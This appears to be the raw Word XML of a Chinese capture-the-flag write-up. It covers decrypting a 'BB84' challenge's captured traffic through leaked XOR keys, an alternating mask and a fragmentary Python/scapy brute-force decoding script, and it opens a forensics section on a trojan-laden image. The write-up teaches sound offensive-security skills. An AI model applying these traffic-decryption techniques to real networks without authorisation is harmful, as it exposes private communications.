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28954">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>BB84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B20871">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A4201B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标系统宣称使用 BB84 分发会话密钥，但实现层在经典信道上明文发送了密钥材料： SEED:123456789 与 XOR_KEY:8660ace90c0352f3 。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37959C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密层为流式异或 + 可预测 PRNG + 固定交替掩码，抓到流量即可离线还原明文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51770B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XOR_KEY 与 SEED 出现在应用层可见负载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD28F3F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>聚合 TCP 5000→4xxxx 的分片为单一密文流，按目的端口排序重组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630677C9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一层：按字节循环异或 XOR_KEY ，得到“伪明文”（大量符号串）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B67660">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二层：检测交替掩码。观察最后分片的开头 owh|r 对齐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEFA814">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'o' ^ 0x09 = 'f'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475FD44F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'w' ^ 0x1B = 'l' 'h' ^ 0x09 = 'a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A8DD2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> '|' ^ 0x1B = 'g'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B74E53">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'r' ^ 0x09 = '{'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9289B2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对整流或关键分片应用交替掩码 [0x09, 0x1B, 0x09, 0x1B, ...] ，恢复真实 ASCII。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B437222">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="648D7151">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="304292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91EE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799A3E2D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导出为bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AFFC8D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CDD25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先用还原到“伪明文”再用交替掩码 逐字节异或，还原为真实 ASCII：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34821C53">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D2BB7E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥是 8 字节的十六进制串： 86 60 AC E9 0C 03 52 F3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2241CB99">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0723F825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直接让ai写个脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C971B6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="29629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38B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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E1EA0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scapy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rdpcap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TCP, UDP,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 IP, IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17384B5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binascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2112DFF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</w:p>
    <w:p w14:paraId="41F2F1D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</w:p>
    <w:p w14:paraId="752B78C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is_printable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15DB459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E34796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.decode(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9F206C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F59ACF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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091359D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101D7C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</w:p>
    <w:p w14:paraId="4F9C024B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3931BC9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5A8C464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pcap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'bb84_attack.pcapng'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D999B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441F05B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pkts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rdpcap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pcap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6A7AA0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{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C926C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61681C6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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244289D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387911F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'xor_key'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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C468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'bases'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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C888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'bits'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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EBD33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'ciphertext'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</w:p>
    <w:p w14:paraId="664B5E9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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F66E6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pkts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246454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getlayer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(TCP)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getlayer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(UDP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C9385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9E4837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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1170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IP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488293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[IP].src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6319565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[IP].dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663D118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IPv6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A107E3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[IPv6].src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BBE47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[IPv6].dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEFD82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9F5E50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319FC15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073A1B8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'sport'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3CB783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'dport'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86E99B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F23AC9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27C3F2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].load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C971B3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printable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is_printable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49EC17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printable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F1D7E6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printable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splitlines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()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FA500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8CE5E8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13A980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7EBFA3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"SEED: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4134CE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249CED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2D103E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'xor_key'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EC6F13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"XOR_KEY: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0-9a-fA-F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1E40D4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BD02DF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'xor_key'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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4D31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'bases'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93262C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"BASES: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2A5E09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C7355C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'bases'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9246B9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'bits'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1445D4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"BITS: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01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EAB87C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8B516A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'bits'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79EBD3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'ciphertext'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43906C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"CIPHERTEXT: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0-9a-fA-F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69CC9B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A29C48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'ciphertext'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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E306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5E6696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0-9a-fA-F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{32,}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D5E118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56A3D9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'ciphertext'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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4064466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setdefault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 []).append(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binascii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hexlify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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A51CA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uniq_texts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11B2658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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76143B0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D2B84E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B08D6F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4D80B1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uniq_texts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5479B4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2AB9AA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'== Printable payload lines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7424E4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uniq_texts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1F7C72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D228FF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Extracted fields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E80701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613A188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E832B5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Flow payload hex summaries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97386A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6DFBF64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 frames=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 sample=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D67294C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B27836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key_hex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'xor_key'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</w:p>
    <w:p w14:paraId="73D47AF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key_hex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5C1112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binascii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unhexlify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key_hex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84B25C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2A39AD8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0D39113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</w:p>
    <w:p w14:paraId="080E5A5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F17FFF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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6565D1A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</w:p>
    <w:p w14:paraId="250466B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fullmatch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0-9a-f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DCA64B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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BA088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binascii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unhexlify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E577D2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9C73A8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FDC2F8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D89992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4A19388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'SEED:'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'XOR_KEY:'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'x++'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5FA1442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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF4028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'e917c4957e'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3ABB91E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EEAB4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7320F2B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binascii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unhexlify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31A944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5E09DB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F13584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Cipher chunks =="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FE9D92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"count=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 bytes=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561BB1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"== Per-chunk quick decrypt (XOR_KEY only) =="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178B2E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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424A2CF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binascii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unhexlify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D82A62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167B48C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77752C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1B955B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741FC7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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># Inspect last chunk thoroughly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132506A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</w:p>
    <w:p w14:paraId="77A9438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binascii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unhexlify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A642C5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045F72B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1C0EFA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86CFD0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== Last chunk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dp_last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 XOR_KEY only =="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737FCE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4D2638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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBF2D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alt_last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09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46FBD4C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F05808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alt_last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3DFCD5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E178C8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3421ABB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== Last chunk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dp_last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 XOR 09/1B =="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36652A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3258FDF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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># brute single-byte on last chunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478BE17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490F90B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5C273F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0C6BB1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DEA155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5F5DAA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377C10C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1416DF9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734AB5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D80FA1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6DAE2E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via single-byte on last chunk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FE931F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78E6C8A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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792721B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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488BBA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</w:p>
    <w:p w14:paraId="079F55E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rng2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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2089327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rng2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randrange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0C38A78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5BE9CF0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E8ADA0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AF681A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9ABE85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707A30E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DC78DC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== Last chunk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dp_last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 xml:space="preserve"> XOR_KEY+PRNG =="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1F86F5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5B6091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p2_last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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41890F8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2101B9D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zlib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bz2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lzma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A218B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decomp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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516ED5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zlib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decompress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bz2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decompress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lzma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decompress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)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EC62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03BE0F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decomp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EF2AD3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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C46F82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9DB3AD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4C9FB2F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03FB1C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555A54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4C8250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1335211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\n\r\t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633CD0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BD9A7D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stream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DBAFFC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9BB136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stream (hex head)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C74A40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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBCEA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09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2092255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A9C470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4CD4E6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084033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419DD6D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8BA209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stream (XOR 09/1B)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22ED90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487FCE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209678E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1BE468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B880C5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3B068C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F2607B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s_alt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4E0A374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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># crude pattern search for {...}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1974A41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_re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D2AA3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finditer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\}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{4,64}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6311DD9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A38D4E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75D64D8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candidate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C855E9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67EAB2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15D45F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5916BA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Braced segment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27953F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8B112C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base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8574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try_base85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1560799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0CCA893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base64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a85decode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base64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b85decode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1276B25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FF99EB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.encode(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'ascii'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7CFF3A9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3AD713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26690DD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outs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7167292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Z85_CHARS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'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&amp;&lt;&gt;()[]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@%$#'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7AF317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try_z85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79E4292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'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&amp;&lt;&gt;()[]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{}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@%$#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E432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enc_map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)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550AD87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24A2A03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686C353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2F1A4E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Z85_CHARS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BB6ABF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A97FB2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FA5926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75FF42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BFB795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7E5784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z85_decode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enc_map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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE040A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5DFB37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6CAAE79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0EAB703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3CAA18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3D8EB8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F5ABAB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z85_decode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enc_map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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB9751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5D3658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3C84032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outs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB549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z85_decode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enc_map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11B10AC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bytearray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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105E33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1AD54AB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</w:p>
    <w:p w14:paraId="6F70ADA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</w:p>
    <w:p w14:paraId="74EF542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C46EF8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enc_map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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7653B67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([(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786FD47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12403C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try_base85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152ABDB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ADD80A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.decode(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709E01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1AC30F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270411F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8CF079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Base85 decoded (XOR_KEY)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0914DE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411C050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6B9CA10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4AA422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908A21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8274CE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4CE789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27A2C1D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try_z85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0D27B5F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0A63B0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.decode(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2844BA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411251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083D469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5C6BA4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Z85 decoded (XOR_KEY)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E74A5B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7CBE83A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0770EB2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19267B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F7AD23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542537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2FE411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60A7B20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rot47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7FE2878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578BDB5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2AA030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8B1236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E7EE8A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49DD22E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0232B3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F24813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20CF2D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rot47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A3CF49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6026CF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ROT47 after XOR_KEY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B0B034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2A6F20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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># Try Caesar shifts on ASCII letters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CE767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caesar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5140C2E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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944C2D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702988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2913F7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33D3F0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2644C0C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FF0F1E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262CDB3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6F2660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930933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C4DEED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1388F87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caesar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3C1515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040F96A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8632E2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8A2F64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87054E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via Caesar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9AC7C5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2AAFC24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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F52B11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4C73DF3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0C75D3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D0F9F9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5782A9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6B7121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03A3F69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0-9a-fA-F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{64}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D51E73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98593D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64-hex in XOR_KEY only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F53DE8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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4C500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6B3896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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># try base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF69F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_re2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base64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_b64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448FBD0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_re2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finditer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A-Za-z0-9+/=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{32,}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7D1F444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291461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C26E43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374062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_b64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b64decode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74CE9B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8D8A08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CF34F3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Base64 decoded (XOR_KEY)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194E51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4EAE10C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7C0D68D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4CF909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9877EA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A36314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6AD5D4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5018F2A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E1E001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58ACD79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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62529B6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15F436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</w:p>
    <w:p w14:paraId="2BEE24A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rng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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1475E5D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rng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randrange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3547AEC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6341B49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7FA5E4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\n\r\t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C46974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A1E40D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with XOR_KEY+PRNG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720CEE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82F0BA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XOR_KEY+PRNG (hex head)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6ED4E5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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7098557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rot47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AF1EDC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D96672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ROT47 after XOR_KEY+PRNG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E65922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63FA19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try_base85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699838E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889270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.decode(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1D3870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1BDE17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0011F2A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837888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Base85 decoded (XOR_KEY+PRNG)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5589D8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41B20D8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1874B32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A6EBE1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583349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2CA79B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368A93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4C9D19D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try_z85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519AC8C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8F16E6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.decode(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250A19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00A94B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72CCABD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55C45F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Z85 decoded (XOR_KEY+PRNG)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B891F1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2DCF6F2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3F6B041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8FBA58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E28C51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111CA7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6882C4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s85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29BEEAD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029776C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DFA267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D0A10E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F49221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279111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r47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6966452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0F45DF5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CD26D6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13CFAF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461107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5F4F09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7AC69A8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mhex2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0-9a-fA-F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{64}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8DC0F7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mhex2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807E49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64-hex in XOR_KEY+PRNG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C5C859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mhex2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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B2FBC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hx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121C7D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_re2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finditer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A-Za-z0-9+/=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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>{32,}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770558B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3E9D18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4A4FB7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8568C9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_b64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b64decode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2092DE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333F01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0C21D8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Base64 decoded (XOR_KEY+PRNG)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97360A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30A3B55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4C8A3B5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C7DA48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1125E5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B6AD13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AEE639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s64d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2F78BE1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0A6AA0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5B2D4C7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44C99A6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308D83D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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ACBB2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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># Try C LCG (glibc-ish) style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D203F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lcg_stream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30E8FAE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bytearray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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04585EA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7fffffff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A9CB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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E20C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1103515245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12345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7fffffff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21502A6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7fff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55079CF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FE6A58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AB6279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688AC0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seed_i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6A8E55F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lcg_stream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seed_i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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE84E4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0BC49E8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12F130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\n\r\t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C36EFC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3D6B5B4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with LCG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D9FF57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79787F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2ABFB1C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099339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055AEE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4EFDCA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26A8D9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filtered_lcg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778D36C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EAF406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04D9E9D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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CE6A1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6306621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</w:p>
    <w:p w14:paraId="6FDB044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rng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'seed'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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36784A29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rng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randrange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57888E4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2E8D7F8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)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E9CA8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3B2877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\n\r\t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B4579E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5BC5B0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PRNG then XOR_KEY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2DDC040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419BE9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Decrypted PRNG then XOR_KEY (hex head)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BEC26F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pt3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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F052F7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0DE3DFF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11C1E5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14D15B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83A6E0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79E9996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347A92B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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D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5C6E0BD4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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE5BE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decomp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2F530AA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5D5CAA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decomp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0EDE1D96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012EF307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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD05B8F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Decompressed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68543D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F6328B3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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D63B53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187C80F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5087D96C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603A93DA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355E35F2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4FE74AB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decomp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decomp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()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA66F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decomp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2634DCD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'flag{'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29BB943E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437499C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1484934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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D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== Flag =='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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C9B4B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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11012668">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E6A69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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F010C5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="1A1B1D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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D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3"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="1A1B1D"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB02B5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2A36E8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705C85D4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F03B823">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="764A1228">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357D68C9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBA0C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="center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可恶的木马竟然伪装成我的朋友</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31552FF0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6E16F9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val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ex180223.log （2018-02-23 的全天访问日志）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE6E04">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val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目标文件： /sxzn/images/banner_home.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D5D5B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38466598">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA55B0E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="63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5822">
      <w:pPr>
        <w:tabs>
